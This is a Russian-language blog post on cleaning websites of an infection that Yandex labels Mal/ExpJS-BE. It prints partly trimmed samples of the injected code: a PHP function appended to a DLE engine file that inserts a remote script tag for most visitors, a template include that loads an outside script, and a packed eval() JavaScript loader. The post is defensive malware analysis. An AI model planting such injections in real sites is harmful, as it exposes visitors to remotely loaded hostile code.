удаление вируса Mal/ExpJS-BE

Обратился клиент с вердиктом яндекса Mal/ExpJS-BE. В исходном коде нашлась причина:

.....
<script src="//li.ru/click?olllaooosq.wha. la/78673421.js"></script>
.....

Движок dle 10.1. Вставка оказалась в конце /engine/engine.php

function keyloger($ua) {

global $db; 
$ip = array("xxx.xxx.xxx.xxx", "xxx.xxx.xxx.xxx");
.....
}
   if (keyloger(trim(getenv ("REMOTE_ADDR"))) == true) $contentes = "";
else
{
$ajax .= "<script src=\"//li.ru/click?olllaooosq.wha.la/78673421.js\"></script>";
}

*
Однако погуглив нашлось несколько вариантов с таким же вердиктом.

1. Dle, вставка в шаблоне:

<script type="text/javascript" src="/59a8faa1a3.php"></script>

в файле вызов левого скрипта

document.write('<script type="text/javascript" src="//wr3.sbdmn.paywebkey. ru/?get_code&template_uid=41186"></script>');

2. Предположительно Drupal (но не точно:) ), вставка в яваскрипте:

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp
.....
|undefined|src|http|iacegz|polruion|ru|scroll|js|Math|random|appendChild||clearInterval|new|Date|setTime|getTime|432000000|setTimeout|yes|path|expires|3000|200|window'.split('|'),0,{}));

*
После дешифровки стал виден вызов

//iacegz.polruion. ru/scroll.js

с параметрами.
Пути попадания пока остались не понятны, но он не является новым, т.к. упоминания о вердикте есть с начала 2013года.

* — по соображениям безопасности часть скрипта удалена.

Скажите свое мнение

ваш email не публикуется. обязательно *

;-) :yawn: :whew: :toivo: :tmi: :time: :thinking: :talking: :sweating: :swear: :sun: :star: :smoke: :smirk: :sleepy: :skype: :shock: :shake: :rofl: :rain: :punch: :puke: :poolparty: :pizza: :phone: :party: :oops: :nod: :no: :ninja: :neutral: :nerd: :music: :muscle: :mrgreen: :movie: :mooning: :mmm: :middlefinger: :makeup: :mail: :mad: :lol: :lipssealed: :kiss: :itwashtme: :inlove: :idea: :hi: :heidy: :heart: :headbang: :happy: :handshake: :giggle: :fubar: :flower: :evilgrin: :emo: :dull: :drunk: :drink: :doh: :devil: :dance: :cry: :cool: :coffie: :clapping: :cash: :call: :cake: :bug: :brokenheart: :bow: :blush: :beer: :bear: :bandit: :arrow: :angry: :angel: :^) :???: :?: :-| :-o :-P :-D :-) :-( :!:

 

*

code

Этот сайт использует Akismet для борьбы со спамом. Узнайте как обрабатываются ваши данные комментариев.